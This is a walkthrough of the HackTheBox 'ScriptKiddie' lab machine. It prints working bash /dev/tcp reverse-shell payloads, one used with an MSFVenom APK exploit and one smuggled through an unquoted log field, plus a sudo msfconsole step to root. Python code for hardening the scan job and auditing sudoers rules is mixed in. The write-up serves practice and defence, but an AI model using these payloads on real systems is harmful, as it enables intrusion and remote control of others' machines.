HackTheBox — ScriptKiddie
As always, we start with nmap to discover open ports/services.
Nmap scan
nmap -sC -sV -oA scriptkiddie 10.10.10.234
We have two open ports: 22/ssh and 5000/http. Let's enumerate the HTTP port.
HTTP Enumeration
Visiting 10.10.10.226:5000, we see that the web application exposes three tools (Nmap, MSFVenom, Searchsploit).
The first thing I tried was injecting OS commands into each field, but nothing worked. Next I searched for public exploits for these tools and found an APK template command injection vulnerability in MSFVenom.
There's a Metasploit module that exploits this vulnerability, but let's use this Python script from Exploit-DB instead.
Exploit: https://www.exploit-db.com/exploits/49491
We need to edit the payload variable in the script first.
payload = 'bash -c "/bin/bash -i >& /dev/tcp/10.10.16.25/1337 0>&1"'
Initial Foothold/User
Now let's start our netcat listener and run the exploit.
And we are on the box as the kid user.
Lateral Movement
After some enumeration I found a script called scanlosers.sh inside the pwn user's home directory. We only have read permissions on it, but I think the script runs regularly, because the hackers file is cleared every few minutes. So let's read the script to understand how it works.
#!/bin/bash
log=/home/kid/logs/hackers
cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done
if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi
It reads the hackers file inside our home directory, splits each line on spaces, takes the third field onward (expected to be the IP address) and runs an Nmap scan on it.
Since that field is interpolated unquoted into sh -c, and we have read/write permissions on the hackers file, we can edit the file to get OS command injection.
Payload: echo "field1 field2 ;bash -c '/bin/bash -i >& /dev/tcp/10.10.16.25/1337 0>&1' #" > hackers
field1 and field2 are only there to satisfy the cut command, so our payload lands in the third field. The ";" terminates the nmap command inside sh -c so our own command runs next, and "#" comments out the rest of the line.
The final step is to run a netcat listener and receive the reverse shell: nc -nvlp 1337
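The defect above is the unquoted field interpolated into sh -c, not the use of Nmap itself. The following is an added example, not the box's script: a Python rewrite of the same job that accepts a line only when it has exactly three fields and the third parses as an IP literal, and then runs nmap as an argument list with no shell, so nothing in the log is ever re-parsed. It assumes the log format "<date> <time> <ip>" (the original keeps field 3 onward) and takes the log and recon paths as parameters; the sample log lines are constructed, one of them shaped like the payload above but with a harmless command.

```python
"""Hardened replacement for the scanlosers.sh job.

Added example, not the box's script. Assumptions: each log line is
"<date> <time> <ip>" (the original takes field 3 onward), and the log and
recon paths are passed in rather than fixed to /home/kid and /home/pwn.
"""
import ipaddress
import subprocess
import tempfile
from pathlib import Path


def parse_targets(lines):
    """Return (valid_ips, rejected_lines).

    The original pipeline `cut -d' ' -f3-` keeps everything after the second
    space and interpolates it unquoted into `sh -c "nmap ... ${ip}"`, so any
    shell metacharacters in the log become commands run as pwn. Here the line
    must have exactly three fields and the third must parse as an IP literal;
    anything else is reported instead of executed.
    """
    valid, rejected, seen = [], [], set()
    for raw in lines:
        fields = raw.split()
        if len(fields) != 3:
            rejected.append(raw)
            continue
        try:
            ip = str(ipaddress.ip_address(fields[2]))
        except ValueError:
            rejected.append(raw)
            continue
        if ip not in seen:  # same de-duplication as the original sort -u
            seen.add(ip)
            valid.append(ip)
    return valid, rejected


def build_scan_command(ip, recon_dir):
    """Argument list for nmap, executed without a shell so nothing is re-parsed."""
    return ["nmap", "--top-ports", "10", "-oN", str(Path(recon_dir) / f"{ip}.nmap"), ip]


def process_log(log_path, recon_dir, runner=subprocess.run):
    """Scan every validated IP in the log, then clear the log like the original.

    `runner` is injectable so the demo below (and tests) can record the
    commands instead of invoking nmap.
    """
    log = Path(log_path)
    lines = log.read_text().splitlines() if log.exists() else []
    valid, rejected = parse_targets(lines)
    for ip in valid:
        runner(build_scan_command(ip, recon_dir),
               stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=False)
    if lines:
        log.write_text("")
    return valid, rejected


def demo():
    """Run process_log over a constructed log with a recording runner."""
    sample = [  # constructed sample lines, not taken from the box
        "2021-02-03 12:00:00 10.10.16.25",
        "2021-02-03 12:00:05 10.10.16.25",  # duplicate, collapsed
        "2021-02-03 12:00:09 2001:db8::1",  # an IPv6 literal passes too
        "field1 field2 ;bash -c 'id' #",    # injection attempt shaped like the write-up's payload
        "not a log line",
    ]
    commands = []

    def record(cmd, **kwargs):
        commands.append(cmd)

    with tempfile.TemporaryDirectory() as tmp:
        log = Path(tmp) / "hackers"
        log.write_text("\n".join(sample) + "\n")
        valid, rejected = process_log(log, Path(tmp) / "recon", runner=record)
        cleared = log.read_text() == ""
    return valid, rejected, commands, cleared


if __name__ == "__main__":
    valid, rejected, commands, cleared = demo()
    print("scanned:", valid)
    print("rejected:", rejected)
    print("log cleared:", cleared)
```

Keeping the rejected lines (rather than silently dropping them) is what turns this job into a detection point: a line that fails validation is exactly the kind of write to the hackers file that the lateral movement above relies on.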
Getting root
Running sudo -l shows that we can run Metasploit's msfconsole as root without a password.
msfconsole lets you execute system commands from within the console itself, so running it as root is equivalent to a root shell.
sudo /opt/metasploit-framework-6-0-9/msfconsole
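A NOPASSWD rule for a program that can spawn commands is the same as a NOPASSWD rule for a shell. The following is an added example, not from the write-up: a small auditor for sudoers user-specification lines that flags rules granting a non-root user a shell-capable program (or ALL) as root without a password. The sample rules are constructed to match what the page reports for kid and msfconsole; the box's real sudoers file is not on the page, and the SHELL_CAPABLE set is an assumption to be extended per environment.

```python
"""Flag sudoers rules that grant a password-less path to a root shell.

Added example, not from the write-up. SAMPLE_RULES is constructed to match
what `sudo -l` showed on the box (kid may run msfconsole as root with
NOPASSWD); the real /etc/sudoers contents are not on the page.
"""
import re
from pathlib import PurePosixPath

# Programs that let the caller run arbitrary commands once started. msfconsole
# is the one from the write-up; the rest are common shell-capable binaries
# (assumption: extend this set for your environment).
SHELL_CAPABLE = {"msfconsole", "bash", "sh", "dash", "zsh", "python3", "perl", "vim", "less"}

# user  host=(runas) [TAG:] command, [TAG:] command ...
_RULE = re.compile(r"^(?P<user>\S+)\s+(?P<host>\S+?)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<spec>.+)$")
_TAG = re.compile(r"^(NOPASSWD|PASSWD|SETENV|NOSETENV|EXEC|NOEXEC|LOG_INPUT|NOLOG_INPUT"
                  r"|LOG_OUTPUT|NOLOG_OUTPUT|MAIL|NOMAIL|FOLLOW|NOFOLLOW):\s*")

SAMPLE_RULES = [  # constructed sample, not the box's real sudoers
    "# constructed sample, not the box's real sudoers",
    "Defaults env_reset",
    "root ALL=(ALL:ALL) ALL",
    "%sudo ALL=(ALL:ALL) ALL",  # password required, so not flagged
    "kid ALL=(root) NOPASSWD: /opt/metasploit-framework-6-0-9/msfconsole",
    "kid ALL=(root) /usr/bin/nmap, NOPASSWD: /usr/bin/id",
]


def parse_rule(line):
    """Parse one user-specification line into per-command entries.

    Returns None for comments, Defaults and alias lines. A NOPASSWD/PASSWD tag
    carries over to later commands in the same rule, as sudoers defines it.
    """
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if line.startswith(("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")):
        return None
    m = _RULE.match(line)
    if not m:
        return None
    entries, nopasswd = [], False
    for item in m.group("spec").split(","):
        item = item.strip()
        while True:
            t = _TAG.match(item)
            if not t:
                break
            if t.group(1) == "NOPASSWD":
                nopasswd = True
            elif t.group(1) == "PASSWD":
                nopasswd = False
            item = item[t.end():]
        program = item.split()[0] if item else ""
        entries.append({"user": m.group("user"), "runas": m.group("runas") or "root",
                        "command": program, "nopasswd": nopasswd})
    return entries


def audit_sudoers(lines):
    """Return (user, command) for every password-less root grant of a shell-capable program."""
    findings = []
    for line in lines:
        for e in parse_rule(line) or []:
            runs_as_root = e["runas"].split(":")[0] in ("root", "ALL")
            shell_capable = e["command"] == "ALL" or PurePosixPath(e["command"]).name in SHELL_CAPABLE
            if e["user"] != "root" and e["nopasswd"] and runs_as_root and shell_capable:
                findings.append((e["user"], e["command"]))
    return findings


if __name__ == "__main__":
    for user, command in audit_sudoers(SAMPLE_RULES):
        print(f"{user}: NOPASSWD root access via shell-capable {command}")
```

Run against a real file with `audit_sudoers(open("/etc/sudoers").read().splitlines())`; the fix for a flagged rule is to remove it, or at minimum drop NOPASSWD, since no argument restriction on msfconsole prevents it from running commands once started.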
And we are ROOT!